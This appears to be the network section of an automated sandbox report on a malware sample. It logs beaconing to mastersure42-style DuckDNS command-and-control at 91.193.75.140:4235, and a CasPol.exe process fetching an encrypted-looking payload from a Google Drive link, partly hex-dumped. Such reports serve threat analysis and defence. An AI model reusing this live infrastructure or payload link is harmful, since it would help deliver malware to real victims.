Nov 3, 2022 07:22:44.345773935 CET	49846	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:45.347752094 CET	49846	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:47.362911940 CET	49846	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:51.377754927 CET	49846	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:19.392076969 CET	49852	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:20.402610064 CET	49852	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:22.417761087 CET	49852	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:26.432399035 CET	49852	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:36.137001991 CET	49853	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:37.148859978 CET	49853	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:39.164077997 CET	49853	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:43.178745985 CET	49853	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:53.327042103 CET	49855	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:54.332618952 CET	49855	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:23:56.347698927 CET	49855	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:24:00.362405062 CET	49855	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:24:30.296247005 CET	49859	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:24:31.308762074 CET	49859	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:24:33.324003935 CET	49859	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:24:37.338728905 CET	49859	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:24:46.980000019 CET	49861	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:24:47.992600918 CET	49861	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:24:50.007767916 CET	49861	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:24:54.022555113 CET	49861	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:03.678822041 CET	49862	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:04.692224026 CET	49862	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:06.707253933 CET	49862	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:10.721962929 CET	49862	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:39.627424955 CET	49866	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:40.637242079 CET	49866	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:42.652507067 CET	49866	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:46.667275906 CET	49866	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:57.479132891 CET	49867	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:25:58.492800951 CET	49867	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:00.492306948 CET	49867	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:04.506989956 CET	49867	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:14.805486917 CET	49870	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:15.817159891 CET	49870	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:17.832159996 CET	49870	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:21.846966982 CET	49870	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:50.893275023 CET	49874	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:51.902858019 CET	49874	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:53.918149948 CET	49874	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:26:57.932811975 CET	49874	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:27:08.804995060 CET	49875	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:27:09.820765018 CET	49875	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:27:11.836194992 CET	49875	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:27:15.850709915 CET	49875	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:27:25.738163948 CET	49876	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:27:26.738899946 CET	49876	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:27:28.754169941 CET	49876	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:27:32.768826962 CET	49876	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:00.613584995 CET	49881	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:01.621855974 CET	49881	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:03.637151957 CET	49881	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:07.651741982 CET	49881	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:17.263108015 CET	49882	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:18.274539948 CET	49882	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:20.289840937 CET	49882	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:24.304409981 CET	49882	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:33.914041996 CET	49883	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:34.927254915 CET	49883	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:36.942250967 CET	49883	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:28:40.957233906 CET	49883	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:08.797992945 CET	49887	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:09.810059071 CET	49887	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:11.825140953 CET	49887	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:15.839953899 CET	49887	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:25.468081951 CET	49888	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:26.478364944 CET	49888	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:28.493432045 CET	49888	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:32.508106947 CET	49888	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:42.120014906 CET	49889	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:43.130920887 CET	49889	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:45.146136999 CET	49889	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:29:49.160748005 CET	49889	4235	192.168.11.20	91.193.75.140

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 07:22:06.085922956 CET	61318	53	192.168.11.20	1.1.1.1
Nov 3, 2022 07:22:06.094679117 CET	53	61318	1.1.1.1	192.168.11.20
Nov 3, 2022 07:22:06.739177942 CET	51603	53	192.168.11.20	1.1.1.1
Nov 3, 2022 07:22:06.778670073 CET	53	51603	1.1.1.1	192.168.11.20
Nov 3, 2022 07:22:08.496257067 CET	56734	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:22:08.606661081 CET	53	56734	8.8.4.4	192.168.11.20
Nov 3, 2022 07:22:26.404068947 CET	62640	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:22:26.414750099 CET	53	62640	8.8.4.4	192.168.11.20
Nov 3, 2022 07:22:44.232770920 CET	54927	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:22:44.344129086 CET	53	54927	8.8.4.4	192.168.11.20
Nov 3, 2022 07:23:19.280148029 CET	59679	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:23:19.391164064 CET	53	59679	8.8.4.4	192.168.11.20
Nov 3, 2022 07:23:36.026688099 CET	54456	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:23:36.136117935 CET	53	54456	8.8.4.4	192.168.11.20
Nov 3, 2022 07:23:53.214232922 CET	49315	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:23:53.325628042 CET	53	49315	8.8.4.4	192.168.11.20
Nov 3, 2022 07:24:30.186912060 CET	62241	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:24:30.295273066 CET	53	62241	8.8.4.4	192.168.11.20
Nov 3, 2022 07:24:46.870704889 CET	64115	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:24:46.979331970 CET	53	64115	8.8.4.4	192.168.11.20
Nov 3, 2022 07:25:03.569710016 CET	62163	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:25:03.677933931 CET	53	62163	8.8.4.4	192.168.11.20
Nov 3, 2022 07:25:39.514545918 CET	56130	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:25:39.626437902 CET	53	56130	8.8.4.4	192.168.11.20
Nov 3, 2022 07:25:57.369896889 CET	56178	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:25:57.478291035 CET	53	56178	8.8.4.4	192.168.11.20
Nov 3, 2022 07:26:14.694293022 CET	62107	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:26:14.804553032 CET	53	62107	8.8.4.4	192.168.11.20
Nov 3, 2022 07:26:50.780349016 CET	58719	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:26:50.892088890 CET	53	58719	8.8.4.4	192.168.11.20
Nov 3, 2022 07:27:08.693469048 CET	60362	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:27:08.804120064 CET	53	60362	8.8.4.4	192.168.11.20
Nov 3, 2022 07:27:25.725686073 CET	49555	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:27:25.737281084 CET	53	49555	8.8.4.4	192.168.11.20
Nov 3, 2022 07:28:00.501806974 CET	62669	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:28:00.612746000 CET	53	62669	8.8.4.4	192.168.11.20
Nov 3, 2022 07:28:17.151650906 CET	63153	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:28:17.262226105 CET	53	63153	8.8.4.4	192.168.11.20
Nov 3, 2022 07:28:33.804290056 CET	63202	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:28:33.913090944 CET	53	63202	8.8.4.4	192.168.11.20
Nov 3, 2022 07:29:08.687299013 CET	51854	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:29:08.797080994 CET	53	51854	8.8.4.4	192.168.11.20
Nov 3, 2022 07:29:25.355581045 CET	52846	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:29:25.467226028 CET	53	52846	8.8.4.4	192.168.11.20
Nov 3, 2022 07:29:42.008141994 CET	57976	53	192.168.11.20	8.8.4.4
Nov 3, 2022 07:29:42.119210958 CET	53	57976	8.8.4.4	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2022 07:22:06.085922956 CET	192.168.11.20	1.1.1.1	0xc7f7	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:22:06.739177942 CET	192.168.11.20	1.1.1.1	0xb56c	Standard query (0)	doc-10-90-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:22:08.496257067 CET	192.168.11.20	8.8.4.4	0x97dc	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:22:26.404068947 CET	192.168.11.20	8.8.4.4	0x1c64	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:22:44.232770920 CET	192.168.11.20	8.8.4.4	0xac6d	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:23:19.280148029 CET	192.168.11.20	8.8.4.4	0x6871	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:23:36.026688099 CET	192.168.11.20	8.8.4.4	0x60be	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:23:53.214232922 CET	192.168.11.20	8.8.4.4	0xc8b3	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:24:30.186912060 CET	192.168.11.20	8.8.4.4	0xf8a5	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:24:46.870704889 CET	192.168.11.20	8.8.4.4	0x66a8	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:25:03.569710016 CET	192.168.11.20	8.8.4.4	0xe79f	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:25:39.514545918 CET	192.168.11.20	8.8.4.4	0x4d08	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:25:57.369896889 CET	192.168.11.20	8.8.4.4	0x42fe	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:26:14.694293022 CET	192.168.11.20	8.8.4.4	0xe123	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:26:50.780349016 CET	192.168.11.20	8.8.4.4	0x4bbd	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:27:08.693469048 CET	192.168.11.20	8.8.4.4	0xbb4b	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:27:25.725686073 CET	192.168.11.20	8.8.4.4	0xdfc8	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:28:00.501806974 CET	192.168.11.20	8.8.4.4	0x8e30	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:28:17.151650906 CET	192.168.11.20	8.8.4.4	0x6830	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:28:33.804290056 CET	192.168.11.20	8.8.4.4	0x3d83	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:29:08.687299013 CET	192.168.11.20	8.8.4.4	0x307	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:29:25.355581045 CET	192.168.11.20	8.8.4.4	0x4fab	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:29:42.008141994 CET	192.168.11.20	8.8.4.4	0x79fd	Standard query (0)	mastersure042.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 3, 2022 07:22:06.094679117 CET	1.1.1.1	192.168.11.20	0xc7f7	No error (0)	drive.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:22:06.778670073 CET	1.1.1.1	192.168.11.20	0xb56c	No error (0)	doc-10-90-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 3, 2022 07:22:06.778670073 CET	1.1.1.1	192.168.11.20	0xb56c	No error (0)	googlehosted.l.googleusercontent.com		172.217.16.193	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:22:08.606661081 CET	8.8.4.4	192.168.11.20	0x97dc	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:22:26.414750099 CET	8.8.4.4	192.168.11.20	0x1c64	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:22:44.344129086 CET	8.8.4.4	192.168.11.20	0xac6d	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:23:19.391164064 CET	8.8.4.4	192.168.11.20	0x6871	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:23:36.136117935 CET	8.8.4.4	192.168.11.20	0x60be	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:23:53.325628042 CET	8.8.4.4	192.168.11.20	0xc8b3	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:24:30.295273066 CET	8.8.4.4	192.168.11.20	0xf8a5	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:24:46.979331970 CET	8.8.4.4	192.168.11.20	0x66a8	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:25:03.677933931 CET	8.8.4.4	192.168.11.20	0xe79f	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:25:39.626437902 CET	8.8.4.4	192.168.11.20	0x4d08	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:25:57.478291035 CET	8.8.4.4	192.168.11.20	0x42fe	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:26:14.804553032 CET	8.8.4.4	192.168.11.20	0xe123	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:26:50.892088890 CET	8.8.4.4	192.168.11.20	0x4bbd	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:27:08.804120064 CET	8.8.4.4	192.168.11.20	0xbb4b	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:27:25.737281084 CET	8.8.4.4	192.168.11.20	0xdfc8	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:28:00.612746000 CET	8.8.4.4	192.168.11.20	0x8e30	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:28:17.262226105 CET	8.8.4.4	192.168.11.20	0x6830	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:28:33.913090944 CET	8.8.4.4	192.168.11.20	0x3d83	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:29:08.797080994 CET	8.8.4.4	192.168.11.20	0x307	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:29:25.467226028 CET	8.8.4.4	192.168.11.20	0x4fab	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false
Nov 3, 2022 07:29:42.119210958 CET	8.8.4.4	192.168.11.20	0x79fd	No error (0)	mastersure042.duckdns.org		91.193.75.140	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-10-90-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49840	142.250.186.78	443	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-03 06:22:06 UTC	0	OUT	GET /uc?export=download&id=1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-11-03 06:22:06 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 03 Nov 2022 06:22:06 GMT Location: https://doc-10-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8du3ehjl7ongfpjedkiiajf5ov/1667456475000/09123801443977292633//1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr?e=download&uuid=caf5e569-6740-43bd-97a5-42b5521fedc0 Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-G5O5ObcBrwbYyLIZwQq2Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49841	172.217.16.193	443	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-03 06:22:06 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8du3ehjl7ongfpjedkiiajf5ov/1667456475000/09123801443977292633/*/1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr?e=download&uuid=caf5e569-6740-43bd-97a5-42b5521fedc0 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-10-90-docs.googleusercontent.com Connection: Keep-Alive
2022-11-03 06:22:07 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycduwE6yscNBUIq2I-1rqbMAM3xE0h8kK0DFSxb1V39jRiZvJh70ifN3yhKhK_iysTDJRK11nKrHuzFRSRG74aC09tj3DppCZ Content-Type: application/octet-stream Content-Disposition: attachment; filename="wdbNlGTYFBlXRFXi154.afm"; filename=UTF-8''wdbNlGTYFBlXRFXi154.afm Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 207424 Date: Thu, 03 Nov 2022 06:22:07 GMT Expires: Thu, 03 Nov 2022 06:22:07 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=ptrZBA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2022-11-03 06:22:07 UTC	6	IN	Data Raw: 43 99 45 2d 19 b8 63 36 20 99 87 0f f4 9e e3 69 4f ce fc 4c 48 88 25 8b 88 35 d2 61 f9 c5 84 aa 43 b4 a4 b1 f3 39 02 c4 e4 38 5d 87 bf e2 76 84 7d f7 76 3a e3 cc db 4d 57 8c 7b 14 63 a7 1d 42 19 71 19 b0 37 a3 47 2e 65 b1 c4 ea 35 a4 e5 1b f7 df f7 0a 5f ce b5 5a 4b 76 40 b1 39 a6 f8 a8 69 3a 1a 3e a1 8e b9 8e f8 5e 10 7a 65 b6 e0 db ff d2 10 fd 1c 2e 14 0c a4 23 14 b5 59 2d 45 ff e4 fc 39 3f 03 e1 5b e4 86 60 ca cd 0c e6 7c d2 82 35 40 c2 b3 17 09 86 c6 be 3c 13 1a 5a f5 e3 3d 77 51 3f c9 f0 f5 f0 bf e3 e7 ae 00 ee fd 20 71 a0 aa cd 3e 8e 5e 84 3f 40 57 5d 35 75 eb f4 0c 42 d1 11 98 04 1e a6 ed 32 c7 ec c7 e8 5d 17 e6 ec 18 8c 72 d8 4e c5 d3 ec a8 03 19 2c 08 fd ad 90 5d d5 76 1a c4 ba 6d 46 62 2b 6f 46 f8 44 1f 03 2b 4f c7 ac 76 4f 59 77 81 86 22 15 b6 Data Ascii: CE-c6 iOLH%5aC98]v}v:MW{cBq7G.e5_ZKv@9i:>^ze.#Y-E9?[`\|5@<Z=wQ? q>^?@W]5uB2]rN,]vmFb+oFD+OvOYw"
2022-11-03 06:22:07 UTC	9	IN	Data Raw: a0 e7 8e 1b 06 27 bc e3 5c 7a 93 ad de 5b fe 17 b9 60 2a 5d df a2 a7 52 51 b9 e0 5f 7b 2a 63 41 37 08 db 6f c6 d6 bf 3e e6 24 3f 7d e3 c0 d4 09 12 c7 4e f1 df 29 77 a0 c0 ba 1a a6 b6 9c 33 f9 a8 6b 2a 03 cf 69 21 8d c3 fe c6 e8 e0 8b 27 97 e7 9e 78 0f 5b bc a3 69 88 ba 1e a3 73 0a 2a d4 0f 31 eb 6d fd ba a4 39 24 b4 e3 e2 66 06 0c 47 cd 5d f0 c1 55 4c e1 f7 e4 aa 3f 7a 06 b4 bf ed d3 98 36 c4 16 8b 32 a0 38 14 c1 d6 ed fe d7 b3 27 c6 55 9f 17 54 ca 9b 25 ba 5e 4a 58 34 3a 3b 1a dd 88 aa cf 70 65 a3 79 3c 4e 68 af 9a 08 7c 63 ce 04 15 5e a8 be 0b bb 3e 75 6c 28 56 ee fd 05 3d 23 2e e0 57 61 93 82 c3 63 29 20 2d 5e fb 13 cf cf 0e 28 0c 78 6a 74 f6 e9 c5 65 e0 da 57 e7 72 0d a3 cd 2f a3 47 2a 4a 49 c4 ea ca 48 d5 1a 4f d4 f7 0a 5f c5 b5 5a 1a 08 03 b1 39 a2 